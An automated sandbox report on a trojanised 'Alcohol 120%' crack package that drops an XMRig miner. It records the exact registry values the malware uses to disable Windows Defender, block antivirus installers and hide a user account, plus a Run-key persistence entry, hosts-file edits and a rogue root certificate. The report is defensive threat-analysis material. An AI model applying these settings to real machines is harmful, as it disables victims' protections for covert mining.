Malware Analysis Report

2025-01-06 10:32

Sample ID 240601-d1qlqsgc6t
Target 893e6bd2f77946a9c59f17ca91a6f2bb_JaffaCakes118
SHA256 17f5d648ae3b0d81ce9bbaa5cf751fc7cda0cacbcd9b940a263dcebc5b63c182
Tags
upx xmrig discovery evasion execution miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

17f5d648ae3b0d81ce9bbaa5cf751fc7cda0cacbcd9b940a263dcebc5b63c182

Threat Level: Known bad

The file 893e6bd2f77946a9c59f17ca91a6f2bb_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx xmrig discovery evasion execution miner persistence trojan

Modifies Windows Defender Real-time Protection settings

xmrig

Modifies visiblity of hidden/system files in Explorer

XMRig Miner payload

Stops running service(s)

Modifies Windows Firewall

Blocks application from running via registry modification

Drops file in Drivers directory

Modifies file permissions

Checks computer location settings

Loads dropped DLL

UPX packed file

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

Drops file in System32 directory

AutoIT Executable

Drops file in Program Files directory

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

NSIS installer

NTFS ADS

Suspicious behavior: LoadsDriver

Gathers network information

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 03:28

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240220-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240215-en

Max time kernel

120s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2776 wrote to memory of 848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2776 wrote to memory of 848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2776 wrote to memory of 848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 848 -ip 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 664

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp

Files

memory/848-1-0x00000000007E1000-0x00000000007E2000-memory.dmp

memory/848-0-0x00000000007E0000-0x00000000007E2000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\SetupHlp.dll

MD5 65112ef6166d441df23715707c7488f7
SHA1 6e8ffef9a32978f43529b12e4a984df6365101be
SHA256 3b8406b26ba2f856192ded44e707d8a1a81daee89403a2600cae085e48b49713
SHA512 c0d1e5214958630beae24e4b2e8bf67553a1c695df7c3e78ff4a69a1ab27e8ded53a87d696185b0defc460ee2c3ac3e6912be263f332de04bcdabe3ecb9e589e

memory/2880-5-0x0000000074D60000-0x0000000074D72000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\System.dll

MD5 c17103ae9072a06da581dec998343fc1
SHA1 b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256 dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512 d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\LangDLL.dll

MD5 9384f4007c492d4fa040924f31c00166
SHA1 aba37faef30d7c445584c688a0b5638f5db31c7b
SHA256 60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
SHA512 68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

memory/2880-20-0x0000000074D00000-0x0000000074D12000-memory.dmp

memory/2880-27-0x0000000074D60000-0x0000000074D72000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\nsDialogs.dll

MD5 c10e04dd4ad4277d5adc951bb331c777
SHA1 b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
SHA256 e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
SHA512 853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240508-en

Max time kernel

144s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

130s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/1420-0-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1420-1-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1420-3-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240221-en

Max time kernel

151s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhost.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\ProgramData\Setup\update.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Setup\update.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion execution

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\RealtekHD\taskhostw.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28